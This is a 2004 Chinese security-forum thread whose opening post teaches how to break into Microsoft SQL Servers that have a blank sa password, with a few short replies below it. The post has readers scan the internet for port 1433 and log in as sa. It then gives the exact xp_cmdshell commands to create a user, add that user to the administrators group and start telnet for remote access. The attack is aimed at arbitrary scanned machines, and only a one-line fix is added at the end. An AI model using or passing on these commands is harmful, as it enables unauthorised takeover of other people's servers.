|
 | 作者: makehacker [makehacker]
 论坛用户 |
登录 |
| 我今天想和大家分享一下,sql空口令的入侵的简单的方法,文章有不足的地方还请你把他指出告诉我一下,这样好让我们共同进步,好了,费话就不说了,下面开始吧, 首先要用两个工具,本人一般用的工具是:superscan SQL Server 2000. 这两个,不过如果你不太喜欢这个工具的话也没关系,反正现在网上的扫描工具随地就能捡到,你说是不是呢(怎么这么多费话呢,) 首先,用Superscan扫描开放1433端口(MS-SQL Server)的机子,OK,不到几分钟就有不少收获~~~ 接着打开SQL客户端工具"SQL查询分析器". 在出现的"连接到SQL Server"中,填入刚才扫到的开放1433端口的机子.连接使用"SQL Server身份应证".用户名填sa,密码是空.点击"确定".只要对方的sa密码是空(我测试的IP,90%都是),一会儿就能连到对方的数据库上了~~~ 好,连上去了,你看到了一个输入SQL命令的窗口“查询--IP.master.sa--无标题” 下面开黑客是如何利用他的: 1,在窗口中输入: EXEC xp_cmdshell 'net user haha 123456789 /add' (按F5执行,填加用户名为:hack,密码为:123456789 的数据库帐号) 2,接着输入: EXEC xp_cmdshell 'net localgroup administrators haha /add' (按F5执行,把hack帐号加到数据库的管理员中) 3,下面是最危险的一招: EXEC xp_cmdshell 'net start telnet' (按F5执行,开启对方的telnet服务) OK,打开一个DOS窗口,telnet IP 是不是就上去了??? 当然,这个TELENT是需要NTLM认证的。所以需要先在本机创建一个和远程主机一样的帐号 至于后续的一些工作,不是这里有讨论的范围了~~~~~~ 看到了吧,hacker就这样简单的入侵了一台计算机. 解决办法,当然是一定要为SA设密码,没必要开启SQL SERVER就要不开  想学黑客技术的请加我的QQ:360197717 |
| 地主 发表时间: 04-10-10 00:18 |
 | 回复: Henung [henung]  论坛用户 |
登录 |
|
好吧,我跟你学,因为我相信你有这个实力! |
| B1层 发表时间: 04-10-10 08:20 |
 | 回复: xingyun [xingyun]  论坛用户 |
登录 |
|
我加了 |
| B2层 发表时间: 04-10-10 11:35 |
 | 回复: zhutoume [zhutoume] |
登录 |
呵呵~~做广告也不要老吹自已怎么怎么吧!!悲!! |
| B3层 发表时间: 04-10-10 11:37 |
 | 回复: hackerjune [hackerjune]  论坛用户 |
登录 |
|
恩 |
| B4层 发表时间: 04-10-10 12:36 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 关于sql空口令的入侵